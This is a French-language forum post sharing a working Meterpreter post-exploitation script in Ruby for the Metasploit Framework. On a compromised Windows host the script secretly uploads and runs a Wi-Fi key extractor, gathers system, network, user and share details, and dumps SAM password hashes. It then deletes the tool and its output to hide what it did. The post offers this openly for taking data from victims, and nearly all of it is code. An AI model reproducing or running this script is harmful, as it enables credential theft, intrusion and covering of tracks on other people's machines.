Annonce

Réduire
Aucune annonce.

meterpreter, upload + destruction exe

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • meterpreter, upload + destruction exe

    flowpa.rb permet l'upload et la destructuion de l'exe une fois que celui-ci nous a refilé ce que l'on voulait.

    Code:
    #
    # This is a Meterpreter script designed to be used by the Metasploit Framework
    #
    # The goal of this script is to obtain system information from a victim through
    # an existing Meterpreter session. This is only a simple example of what can
    # be accomplished through Meterpreter scripting.
    #
    # hdm[at]metasploit.com
    #
    
    # Some of this script was developed in conjunction with _MAX_ (max[at]remote-exploit.org)
    # The complete version will be released in the future as 'autometer'
    
    # Delete a file (meterpreter has no unlink API yet)
    def m_unlink(session, path)
        r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil, {'Hidden' => 'true'})
        while(r.name)
            select(nil, nil, nil, 0.10)
        end
        r.close
    end
    
    # Exec a command and return the results
    def m_exec(session, cmd)
        r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
        b = ""
        while(d = r.channel.read)
            b << d
        end
        r.channel.close            
        r.close
        b
    end
    
    
    # The 'client' object holds the Meterpreter session
    # Aliasing here for plugin compatibility
    session = client
    
    # Extract the host and port
    host,port = session.tunnel_peer.split(':')
    
    print_status("Nouvelle session > #{host}:#{port}...")
    
    print_status("Upload de Wireless Key Viewer...")
    session.fs.file.upload_file("%WinDir%\\WirelessKeyView.exe", "/tmp/WirelessKeyView.exe")
    print_status("Execution de Wireless Key Viewer...")
    session.sys.process.execute("cmd.exe /c wkv /stext %WinDir%/wire.txt", nil, {'Hidden' => 'true'})
    sleep(2)
    
    # Create a directory for the logs
    logs = File.join(::Dir.tmpdir, 'atxwpalogs', host + "_" + Time.now.strftime("%Y%m%d.%M%S")+sprintf("%.3d",rand(100)) )
    
    # Create the log directory
    FileUtils.mkdir_p(logs)
    
    
    begin
    
        tmp = session.fs.file.expand_path("%TEMP%")
    
        print_status("Collecte des informations system...")
    
        File.open(File.join(logs, "network.txt"), "w") do |fd|
            fd.puts("=" * 70)
            session.net.config.each_route do |route|
                fd.puts("Local subnet: #{route.subnet}/#{route.netmask}")
            end
    
            fd.puts("=" * 70)
            fd.puts(m_exec(session, "netstat -na"))
    
            fd.puts("=" * 70)
            fd.puts(m_exec(session, "netstat -ns"))
        end
    
        info = session.sys.config.sysinfo()
        File.open(File.join(logs, "system.txt"), "w") do |fd|
            fd.puts("Computer: #{info['Computer']}")
            fd.puts("OS: #{info['OS']}")
        end
    
        File.open(File.join(logs, "env.txt"), "w") do |fd|
            fd.puts(m_exec(session, "cmd.exe /c set"))
        end
    
        File.open(File.join(logs, "wireless.txt"), "w") do |fd|
            fd.puts(m_exec(session, "cmd.exe /c type %WinDir%\\wire.txt"))
    
        end
    
        File.open(File.join(logs, "users.txt"), "w") do |fd|
            fd.puts(m_exec(session, "net user"))
        end
    
        File.open(File.join(logs, "shares.txt"), "w") do |fd|
            fd.puts(m_exec(session, "net share"))
        end
    
        File.open(File.join(logs, "services.txt"), "w") do |fd|
            fd.puts(m_exec(session, "net start"))
        end
    
        File.open(File.join(logs, "nethood.txt"), "w") do |fd|
            fd.puts(m_exec(session, "net view"))
        end
    
        File.open(File.join(logs, "localgroup.txt"), "w") do |fd|
            fd.puts(m_exec(session, "net localgroup"))
        end
    
        File.open(File.join(logs, "group.txt"), "w") do |fd|
            fd.puts(m_exec(session, "net group"))
        end
    
        begin
            session.core.use("priv")
            hashes = session.priv.sam_hashes
            print_status("Recuperation des hashes windows...")
            File.open(File.join(logs, "hashes.txt"), "w") do |fd|
                hashes.each do |user|
                    fd.puts(user.to_s)
                end
            end
        rescue ::Exception => e
            print_status("Erreur dumping hashes: #{e.class} #{e}")
        end
    
    #    print_status("Obtaining the entire registry...")
    #    hives = %w{HKCU HKLM HKCC HKCR HKU}
    #    hives.each do |hive|
    #        print_status(" Exporting #{hive}")
    #
    #        tempname = "#{tmp}\\#{Rex::Text.rand_text_alpha(8)}.reg"
    #        m_exec(session, "reg.exe export #{hive} #{tempname}")
    #
    #        print_status(" Downloading #{hive} (#{tempname})")
    #        session.fs.file.download_file(File.join(logs, "#{hive}.reg"), tempname)
    
    #        print_status(" Cleaning #{hive}")
    #        m_unlink(session, tempname)
    #    end
        
        print_status("Suppression de Wireless Key Viewer...")
        session.sys.process.execute("cmd.exe /c del %WinDir%\\wire.txt", nil, {'Hidden' => true})
        session.sys.process.execute("cmd.exe /c del %WinDir%\\WirelessKeyView.exe", nil, {'Hidden' => true})
    
        print_status("Recuperation des donnees terminee sur #{host}:#{port}...")
        
    rescue ::Exception => e
        print_status("Exception: #{e.class} #{e} #{e.backtrace}")
    end
    dédicace : koala
    sigpic

    Cyprium Download Link

    Plus j'étudie plus j'me rends compte que je n'sais rien.

    †|
Chargement...
X